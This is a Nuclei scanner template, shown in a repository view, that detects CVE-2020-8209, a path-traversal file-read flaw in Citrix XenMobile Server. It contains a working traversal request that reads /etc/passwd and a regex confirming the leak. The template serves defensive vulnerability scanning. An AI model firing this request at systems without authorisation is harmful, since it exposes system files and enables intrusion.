nuclei-templates/http/cves/2020/CVE-2020-8209.yaml

50 lines
1.5 KiB
YAML
Raw Normal View History

2021-01-02 04:56:15 +00:00
id: CVE-2020-8209
info:
name: Citrix XenMobile Server - Local File Inclusion
author: dwisiswant0
severity: high
description: |
Citrix XenMobile Server 10.12 before RP2, Citrix XenMobile Server 10.11 before RP4, Citrix XenMobile Server 10.10 before RP6, and Citrix XenMobile Server before 10.9 RP5 are susceptible to local file inclusion vulnerabilities.
reference:
- https://swarm.ptsecurity.com/path-traversal-on-citrix-xenmobile-server/
- https://support.citrix.com/article/CTX277457
- https://nvd.nist.gov/vuln/detail/CVE-2020-8209
2023-09-06 12:22:36 +00:00
remediation: |
Apply the latest security patches or updates provided by Citrix to fix the vulnerability.
reference:
- https://support.citrix.com/article/CTX277457
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-8209
cwe-id: CWE-22
2023-07-11 19:49:27 +00:00
epss-score: 0.97223
2023-08-31 11:46:18 +00:00
epss-percentile: 0.99746
2023-09-06 12:22:36 +00:00
cpe: cpe:2.3:a:citrix:xenmobile_server:*:*:*:*:*:*:*:*
metadata:
max-request: 1
2023-07-11 19:49:27 +00:00
vendor: citrix
product: xenmobile_server
tags: cve,cve2020,citrix,lfi,xenmobile
http:
- method: GET
path:
- "{{BaseURL}}/jsp/help-sb-download.jsp?sbFileName=../../../etc/passwd"
2022-07-02 11:31:17 +00:00
matchers-condition: and
matchers:
- type: word
2022-07-02 11:31:17 +00:00
part: header
words:
- "fileDownload=true"
- "application/octet-stream"
- "attachment;"
condition: and
2023-07-11 19:49:27 +00:00
- type: regex
part: body
regex:
- "root:.*:0:0:"